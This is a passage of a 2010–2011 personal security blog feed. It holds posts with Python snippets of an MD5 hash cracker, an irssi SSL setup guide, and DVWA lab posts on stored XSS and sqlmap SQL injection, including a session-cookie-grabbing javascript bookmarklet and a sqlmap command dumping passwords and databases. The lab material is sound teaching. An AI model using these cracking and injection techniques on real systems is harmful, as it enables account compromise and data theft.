		<description><![CDATA[Online/ofline md5 cracker Currently containes about 14 db for online cracking here are two snips from the source code: 128   def bigtrapeze(): 129     site = 'http://www.bigtrapeze.com/' 130     rest = 'md5/index.php?query=%s' %passwd 131     req = urllib2.Request(site+rest) 132     req.add_header('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.2)\ 133     Gecko/20100316 AskTbSPC2/3.9.1.14019 Firefox/3.6.2') 134     opener = urllib2.build_opener() 135     data [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=239&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:center;"><a href="http://lnxg33k.files.wordpress.com/2011/03/icrack3.png"><img class="aligncenter size-full wp-image-316" title="icrack3" src="http://lnxg33k.files.wordpress.com/2011/03/icrack3.png?w=640&#038;h=458" alt="" width="640" height="458" /></a> <span id="more-239"></span></p>
<pre>Online/ofline md5 cracker
Currently containes about 14 db for online cracking</pre>
<p>here are two snips from the source code:</p>
<blockquote>
<pre>128   def bigtrapeze():
129     site = 'http://www.bigtrapeze.com/'
130     rest = 'md5/index.php?query=%s' %passwd
131     req = urllib2.Request(site+rest)
132     req.add_header('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.2)\
133     Gecko/20100316 AskTbSPC2/3.9.1.14019 Firefox/3.6.2')
134     opener = urllib2.build_opener()
135     data = opener.open(req).read()
136     match = re.search('(=&gt; &lt;strong&gt;)(\w+.\w+)', data)
137     if match: print '[-] site: %s\t\t\tPassword: %s' %(site, match.group(2))
138     else: print '[-] site: %s\t\t\tPassword: Not found' %site
139   bigtrapeze()</pre>
</blockquote>
<blockquote>
<pre>211     def offline():
212       print '[+] This opertaion will take some time, be patient ...'
213       dictionary = sys.argv[3]
214       dic = {}
215       shooter = 0
216       try:
217         f = open(dictionary, 'rb')
218         for line in f:
219           line = line.rstrip()
220           dic[line] = hashlib.md5(line).hexdigest()
221         for k in dic.keys():
222           if passwd in dic[k]:
223             print '\n[-] Hash:', dic[k], '   \t\t\t', 'Data:', k
224             shooter += 1
225         if shooter == 0:  print "\n[*]Password not found in [%s] try the online cracker\n" % dictionary
226         f.close()
227       except IOError: print '\n[*] Erorr: %s doesn\'t exsit \n' % dictionary
228     offline()</pre>
</blockquote>
<p>Tow shots for using both the flags in cracking:</p>
<p><a href="http://lnxg33k.files.wordpress.com/2011/03/icrack1.png"><img class="aligncenter size-full wp-image-317" title="icrack1" src="http://lnxg33k.files.wordpress.com/2011/03/icrack1.png?w=640&#038;h=453" alt="" width="640" height="453" /></a><a href="http://lnxg33k.files.wordpress.com/2011/03/icrack2.png"><img class="aligncenter size-full wp-image-318" title="icrack2" src="http://lnxg33k.files.wordpress.com/2011/03/icrack2.png?w=640&#038;h=480" alt="" width="640" height="480" /></a></p>
<p>to download it in plain text:</p>
<p><a title="icrack.py download" href="http://www.lnxg33k.net/tools/icrack.py">icrack.py download</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/lnxg33k.wordpress.com/239/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/lnxg33k.wordpress.com/239/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/lnxg33k.wordpress.com/239/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/lnxg33k.wordpress.com/239/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/lnxg33k.wordpress.com/239/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/lnxg33k.wordpress.com/239/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/lnxg33k.wordpress.com/239/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/lnxg33k.wordpress.com/239/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/lnxg33k.wordpress.com/239/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/lnxg33k.wordpress.com/239/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/lnxg33k.wordpress.com/239/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/lnxg33k.wordpress.com/239/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/lnxg33k.wordpress.com/239/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/lnxg33k.wordpress.com/239/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=239&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://lnxg33k.wordpress.com/2011/03/05/scripts-md5-hash-cracker-online-offline/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/caab8aa8798f1ce048893ddc62de657b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">lnxg33k</media:title>
		</media:content>

		<media:content url="http://lnxg33k.files.wordpress.com/2011/03/icrack3.png" medium="image">
			<media:title type="html">icrack3</media:title>
		</media:content>

		<media:content url="http://lnxg33k.files.wordpress.com/2011/03/icrack1.png" medium="image">
			<media:title type="html">icrack1</media:title>
		</media:content>

		<media:content url="http://lnxg33k.files.wordpress.com/2011/03/icrack2.png" medium="image">
			<media:title type="html">icrack2</media:title>
		</media:content>
	</item>
		<item>
		<title>IRC Freenode; connect via SSL on irssi on Slackware 13.1</title>
		<link>http://lnxg33k.wordpress.com/2011/01/19/irc-freenode-connect-via-ssl-on-irssi-on-slackware-13-1/</link>
		<comments>http://lnxg33k.wordpress.com/2011/01/19/irc-freenode-connect-via-ssl-on-irssi-on-slackware-13-1/#comments</comments>
		<pubDate>Wed, 19 Jan 2011 12:06:49 +0000</pubDate>
		<dc:creator>lnxg33k</dc:creator>
				<category><![CDATA[Articles]]></category>
		<category><![CDATA[freenode]]></category>
		<category><![CDATA[irc]]></category>
		<category><![CDATA[irssi]]></category>
		<category><![CDATA[slackware]]></category>
		<category><![CDATA[ssl]]></category>
		<category><![CDATA[xchat]]></category>

		<guid isPermaLink="false">http://lnxg33k.wordpress.com/?p=189</guid>
		<description><![CDATA[About Irssi Irssi is a terminal based IRC client for UNIX systems. It also supports SILC and ICB protocols via plugins. I will show how to connect to Free node using SSL and irssi first we need a valid certification for SSL : bash-4.1# cd /root/ &#38;&#38; mkdir ssl &#38;&#38; cd ssl bash-4.1# wget http://rlworkman.net/pkgs/sources/13.0/ca-certificates/ca-certificates.SlackBuild [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=189&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://lnxg33k.files.wordpress.com/2011/01/irssi2.png"><img class="aligncenter" title="irssi2" src="http://lnxg33k.files.wordpress.com/2011/01/irssi2.png?w=600&#038;h=434" alt="" width="600" height="434" /></a><span id="more-189"></span></p>
<h1>About Irssi</h1>
<p>Irssi is a terminal based IRC client for UNIX systems. It also 	supports SILC and ICB protocols via plugins.</p>
<p>I will show how to connect to Free node using SSL and irssi</p>
<p>first we need a valid certification for SSL :</p>
<p>bash-4.1# cd /root/ &amp;&amp; mkdir ssl &amp;&amp; cd ssl</p>
<p>bash-4.1# wget http://rlworkman.net/pkgs/sources/13.0/ca-certificates/ca-certificates.SlackBuild</p>
<p>bash-4.1# wget http://rlworkman.net/pkgs/sources/13.0/ca-certificates/ca-certificates_20090814.tar.gz</p>
<p>bash-4.1# ./ca-certificates.SlackBuild</p>
<p>now we have installed the root ca-certificates</p>
<p>now fire up irssi on your terminal</p>
<p>after the irssi interface comes up just type :<br />
/network add  freenode<br />
/connect -ssl_verify  chat.freenode.net 7000<br />
/save<br />
/network add -autosendcmd &#8220;/msg nickserv identify <span style="text-decoration:underline;"><strong>PASSWORD</strong></span>; wait 2000&#8243; freenode<br />
/save<br />
/channel add -auto <span style="text-decoration:underline;"><strong>#intern0t</strong></span> freenode<br />
/save<br />
/set real_name  <span style="text-decoration:underline;"><strong>NAME</strong></span><br />
/set user_name <strong><span style="text-decoration:underline;">NICKNAME</span></strong><br />
/set nick <strong><span style="text-decoration:underline;">NICKNAME</span></strong><br />
/set alternate_nick <span style="text-decoration:underline;"><strong>ALTNICKNAME</strong></span></p>
<p>You can use your preferred theme :<br />
bash-4.1# cd ~/.irssi<br />
bash-4.1# wget http://irssi.org/themefiles/madcow.theme<br />
fireup your irssi again then type:<br />
/set theme madcow<br />
/save</p>
<p>now everything should work great and you should see something like that :</p>
<p><a href="http://lnxg33k.files.wordpress.com/2011/01/irssi2.png"><img class="aligncenter size-full wp-image-191" title="irssi2" src="http://lnxg33k.files.wordpress.com/2011/01/irssi2.png?w=640" alt=""   /></a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/lnxg33k.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/lnxg33k.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/lnxg33k.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/lnxg33k.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/lnxg33k.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/lnxg33k.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/lnxg33k.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/lnxg33k.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/lnxg33k.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/lnxg33k.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/lnxg33k.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/lnxg33k.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/lnxg33k.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/lnxg33k.wordpress.com/189/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=189&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://lnxg33k.wordpress.com/2011/01/19/irc-freenode-connect-via-ssl-on-irssi-on-slackware-13-1/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/caab8aa8798f1ce048893ddc62de657b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">lnxg33k</media:title>
		</media:content>

		<media:content url="http://lnxg33k.files.wordpress.com/2011/01/irssi2.png" medium="image">
			<media:title type="html">irssi2</media:title>
		</media:content>

		<media:content url="http://lnxg33k.files.wordpress.com/2011/01/irssi2.png" medium="image">
			<media:title type="html">irssi2</media:title>
		</media:content>
	</item>
		<item>
		<title>Video: DVWA Stored XSS via SET</title>
		<link>http://lnxg33k.wordpress.com/2010/11/12/video-dvwa-stored-xss-via-set/</link>
		<comments>http://lnxg33k.wordpress.com/2010/11/12/video-dvwa-stored-xss-via-set/#comments</comments>
		<pubDate>Fri, 12 Nov 2010 16:25:16 +0000</pubDate>
		<dc:creator>lnxg33k</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[backtrack]]></category>
		<category><![CDATA[dvwa]]></category>
		<category><![CDATA[set]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://lnxg33k.wordpress.com/?p=183</guid>
		<description><![CDATA[&#8220;exploiting stored XSS on DVWA via SET&#8220; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; XSS: Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=183&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<h2 style="text-align:center;">&#8220;exploiting stored <span style="color:#ff0000;">XSS </span>on <span style="color:#ff0000;">DVWA </span>via <span style="color:#ff0000;">SET</span>&#8220;</h2>
<h2 style="text-align:center;">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</h2>
<p style="text-align:center;"><a href="http://lnxg33k.files.wordpress.com/2010/11/xss.png"><img class="aligncenter size-full wp-image-185" title="xss" src="http://lnxg33k.files.wordpress.com/2010/11/xss.png?w=640" alt=""   /></a><span id="more-183"></span></p>
<p>XSS: Cross-Site Scripting attacks are a type of injection problem, in  which malicious scripts are injected into the otherwise benign and  trusted web sites. Cross-site scripting (XSS) attacks occur when an  attacker uses a web application to send malicious code, generally in the  form of a browser side script, to a different end user. Flaws that  allow these attacks to succeed are quite widespread and occur anywhere a  web application uses input from a user in the output it generates  without validating or encoding it.</p>
<p>An attacker can use XSS to send a malicious script to an  unsuspecting user. The end user’s browser has no way to know that the  script should not be trusted, and will execute the script. Because it  thinks the script came from a trusted source, the malicious script can  access any cookies, session tokens, or other sensitive information  retained by your browser and used with that site. These scripts can even  rewrite the content of the HTML page.</p>
<h4>Stored XSS Attacks</h4>
<p>Stored attacks are those where the injected code is permanently  stored on the target servers, such as in a database, in a message forum,  visitor log, comment field, etc. The victim then retrieves the  malicious script from the server when it requests the stored  information.</p>
<p style="text-align:center;"><a href="http://lnxg33k.files.wordpress.com/2010/11/xss.png"></a><a href="http://lnxg33k.files.wordpress.com/2010/11/xss.png"><br />
</a><span style="text-align:center; display: block;"><a href="http://lnxg33k.wordpress.com/2010/11/12/video-dvwa-stored-xss-via-set/"><img src="http://img.youtube.com/vi/EVuQsGynoUA/2.jpg" alt="" /></a></span></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/lnxg33k.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/lnxg33k.wordpress.com/183/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/lnxg33k.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/lnxg33k.wordpress.com/183/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/lnxg33k.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/lnxg33k.wordpress.com/183/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/lnxg33k.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/lnxg33k.wordpress.com/183/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/lnxg33k.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/lnxg33k.wordpress.com/183/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/lnxg33k.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/lnxg33k.wordpress.com/183/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/lnxg33k.wordpress.com/183/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/lnxg33k.wordpress.com/183/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=183&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://lnxg33k.wordpress.com/2010/11/12/video-dvwa-stored-xss-via-set/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/caab8aa8798f1ce048893ddc62de657b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">lnxg33k</media:title>
		</media:content>

		<media:content url="http://lnxg33k.files.wordpress.com/2010/11/xss.png" medium="image">
			<media:title type="html">xss</media:title>
		</media:content>
	</item>
		<item>
		<title>video: DVWA sql-injection with SQLmap and &#8211;cookie flag :)</title>
		<link>http://lnxg33k.wordpress.com/2010/10/01/video-dvwa-sql-injection-with-sqlmap-and-cookie-flag/</link>
		<comments>http://lnxg33k.wordpress.com/2010/10/01/video-dvwa-sql-injection-with-sqlmap-and-cookie-flag/#comments</comments>
		<pubDate>Fri, 01 Oct 2010 09:48:49 +0000</pubDate>
		<dc:creator>lnxg33k</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[cookie]]></category>
		<category><![CDATA[dvwa]]></category>
		<category><![CDATA[samurai]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[sqlmap]]></category>

		<guid isPermaLink="false">http://lnxg33k.wordpress.com/?p=179</guid>
		<description><![CDATA[&#8220;SQLmap with &#8211;cookie flag and &#8211;string too!!&#8221; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- 1) DVWA uses a PHP Session cookie to authenticate users. If the session cookie is not valid, a page redirection will send you to the login page. This prevents sqlmap from getting access to the injection location. This can be fixed by adding the &#8211;cookie &#8220;cookie data&#8221; [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=179&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<h3 style="text-align:center;">&#8220;<span style="color:#ff0000;">SQLmap</span> with <span style="color:#ff0000;">&#8211;cookie</span> flag and <span style="color:#ff0000;">&#8211;string</span> too!!&#8221;</h3>
<p style="text-align:center;">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p style="text-align:center;"><a href="http://lnxg33k.files.wordpress.com/2010/10/1.png"><img class="aligncenter size-full wp-image-180" title="sqlmap" src="http://lnxg33k.files.wordpress.com/2010/10/1.png?w=640" alt=""   /><span id="more-179"></span></a></p>
<p style="text-align:left;">1) DVWA uses a PHP Session cookie to authenticate users.  If the session  cookie is not valid, a page redirection will send you to the login  page.  This prevents sqlmap from getting access to the injection  location.  This can be fixed by adding the &#8211;cookie &#8220;cookie data&#8221;  option.  How do you get your cookie data you may ask.  My favorite way  is to add a shortcut on your favorites menu with a link to &#8220;j<strong></strong>avascript: alert(document.cookie);&#8221;.  Click on the link &#8211; sooner then you can say &#8220;C is for cookie&#8221; you have it.</p>
<p>2) sqlmap uses a comparison to determine if the entered SQLi phrase was  successful or not.  It is built to work on more secure pages (It isn&#8217;t  used to something as DV as DVWA).  So&#8230;to fix this, we can feed it a  string that will only show up on success.  What string would that be?  I  like to use &#8220;First name&#8221;.  You can use whatever you want (so long as it  only is on the page from a successful query).  Use the &#8211;string option  to do this.</p>
<p>3) I know, I know &#8211; I said there were only two things.  By default DVWA  should connect to the MySQL database as root.  If you have changed this,  then quit fixing things (Just kidding &#8211; way to think secure &#8211; this  should be a lesson for any DBAs out there that happen to find this).   sqlmap is able to do much more if it has access (via injection) to the  database as a root user.</p>
<p>To get started try something like this:</p>
<p>./sqlmap.py -u  &#8220;http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&#8221;  &#8211;cookie &#8220;[enter cookie data here]&#8221; -p id &#8211;string &#8220;First name:&#8221;  &#8211;passwords &#8211;dbs</p>
<p style="text-align:left;">captured from<a href="http://www.dvwa.co.uk/forum/showthread.php?tid=4"> DVWA forum </a></p>
<p style="text-align:left;">to get a copy of DVWA : http://www.dvwa.co.uk/download.php</p>
<p style="text-align:center;"><span style="text-align:center; display: block;"><a href="http://lnxg33k.wordpress.com/2010/10/01/video-dvwa-sql-injection-with-sqlmap-and-cookie-flag/"><img src="http://img.youtube.com/vi/Q3p_joL7X8E/2.jpg" alt="" /></a></span></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/lnxg33k.wordpress.com/179/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/lnxg33k.wordpress.com/179/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/lnxg33k.wordpress.com/179/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/lnxg33k.wordpress.com/179/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/lnxg33k.wordpress.com/179/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/lnxg33k.wordpress.com/179/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/lnxg33k.wordpress.com/179/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/lnxg33k.wordpress.com/179/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/lnxg33k.wordpress.com/179/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/lnxg33k.wordpress.com/179/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/lnxg33k.wordpress.com/179/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/lnxg33k.wordpress.com/179/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/lnxg33k.wordpress.com/179/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/lnxg33k.wordpress.com/179/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=179&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://lnxg33k.wordpress.com/2010/10/01/video-dvwa-sql-injection-with-sqlmap-and-cookie-flag/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/caab8aa8798f1ce048893ddc62de657b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">lnxg33k</media:title>
		</media:content>

		<media:content url="http://lnxg33k.files.wordpress.com/2010/10/1.png" medium="image">
			<media:title type="html">sqlmap</media:title>
		</media:content>
	</item>
		<item>
		<title>Scripts: idecoder ver. 0.5</title>
		<link>http://lnxg33k.wordpress.com/2010/09/25/scripts-idecoder-ver-0-5/</link>
		<comments>http://lnxg33k.wordpress.com/2010/09/25/scripts-idecoder-ver-0-5/#comments</comments>
		<pubDate>Sat, 25 Sep 2010 17:56:32 +0000</pubDate>
		<dc:creator>lnxg33k</dc:creator>
				<category><![CDATA[My scripts]]></category>
		<category><![CDATA[ascii]]></category>
		<category><![CDATA[base64]]></category>
		<category><![CDATA[hex]]></category>
		<category><![CDATA[idecoder]]></category>
		<category><![CDATA[python]]></category>

		<guid isPermaLink="false">http://lnxg33k.wordpress.com/?p=169</guid>
		<description><![CDATA[&#8220;idecoder ver. 0.5&#8243; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; * Hello and welcome to lnxg33l blog I have just written ideocder script :it&#8217;s a multi encoding/decoding script contains a lot of   encoders/decoders offered by python lang Some new features of the script: the ability to encode/decode files with base64 and uuencode Hex_entity and ASCII add to the script &#160; here&#8217;s the link [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=169&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<h3 style="text-align:center;">&#8220;<span style="color:#ff0000;">idecoder</span> ver. 0.5&#8243;</h3>
<p style="text-align:center;">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p style="text-align:left;"><a href="http://lnxg33k.files.wordpress.com/2010/09/1.png"><img class="aligncenter size-full wp-image-170" title="idecoder1" src="http://lnxg33k.files.wordpress.com/2010/09/1.png?w=640" alt=""   /></a><span id="more-169"></span>* Hello and welcome to lnxg33l blog</p>
<p style="text-align:left;">I have just written ideocder script :it&#8217;s a multi encoding/decoding script contains a lot of   encoders/decoders offered by python lang</p>
<p style="text-align:left;">Some new features of the script:</p>
<p style="text-align:left;">the ability to encode/decode files with base64 and uuencode</p>
<p style="text-align:left;">Hex_entity and ASCII add to the script</p>
<p style="text-align:left;"><a href="http://lnxg33k.files.wordpress.com/2010/09/2.png"><img class="aligncenter size-full wp-image-172" title="idecoder" src="http://lnxg33k.files.wordpress.com/2010/09/2.png?w=640" alt=""   /></a></p>
<p style="text-align:left;">&nbsp;</p>
<p style="text-align:left;"><a href="http://lnxg33k.files.wordpress.com/2010/09/3.png"><img class="aligncenter size-full wp-image-173" title="ideocder" src="http://lnxg33k.files.wordpress.com/2010/09/3.png?w=640" alt=""   /></a></p>
<p style="text-align:left;">here&#8217;s the link to download the script :</p>
<p style="text-align:left;">&#8212;-&gt; <a href="http://rapidshare.com/files/421237008/idecoder_ver_0.5.tar.gz">ideocder.py</a> &lt;&#8212;- rapid-share link</p>
<p style="text-align:left;">&#8212;-&gt; <a href="http://www.mediafire.com/?w5lh8027ewuaa51">idecoder.py</a> &lt;&#8212;- mediafire link</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/lnxg33k.wordpress.com/169/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/lnxg33k.wordpress.com/169/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/lnxg33k.wordpress.com/169/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/lnxg33k.wordpress.com/169/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/lnxg33k.wordpress.com/169/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/lnxg33k.wordpress.com/169/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/lnxg33k.wordpress.com/169/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/lnxg33k.wordpress.com/169/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/lnxg33k.wordpress.com/169/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/lnxg33k.wordpress.com/169/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/lnxg33k.wordpress.com/169/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/lnxg33k.wordpress.com/169/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/lnxg33k.wordpress.com/169/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/lnxg33k.wordpress.com/169/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=169&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://lnxg33k.wordpress.com/2010/09/25/scripts-idecoder-ver-0-5/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/caab8aa8798f1ce048893ddc62de657b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">lnxg33k</media:title>
		</media:content>

		<media:content url="http://lnxg33k.files.wordpress.com/2010/09/1.png" medium="image">
			<media:title type="html">idecoder1</media:title>
		</media:content>

		<media:content url="http://lnxg33k.files.wordpress.com/2010/09/2.png" medium="image">
			<media:title type="html">idecoder</media:title>
		</media:content>

		<media:content url="http://lnxg33k.files.wordpress.com/2010/09/3.png" medium="image">
			<media:title type="html">ideocder</media:title>
		</media:content>
	</item>
		<item>
		<title>Video: try2hack wargame &#8220;first 3 levels solution&#8221;</title>
		<link>http://lnxg33k.wordpress.com/2010/09/12/video-try2hack-wargame-first-3-levels-solution/</link>
		<comments>http://lnxg33k.wordpress.com/2010/09/12/video-try2hack-wargame-first-3-levels-solution/#comments</comments>
		<pubDate>Sun, 12 Sep 2010 17:07:52 +0000</pubDate>
		<dc:creator>lnxg33k</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[challenge]]></category>
		<category><![CDATA[try2hack]]></category>
		<category><![CDATA[wargame]]></category>

		<guid isPermaLink="false">http://lnxg33k.wordpress.com/?p=155</guid>
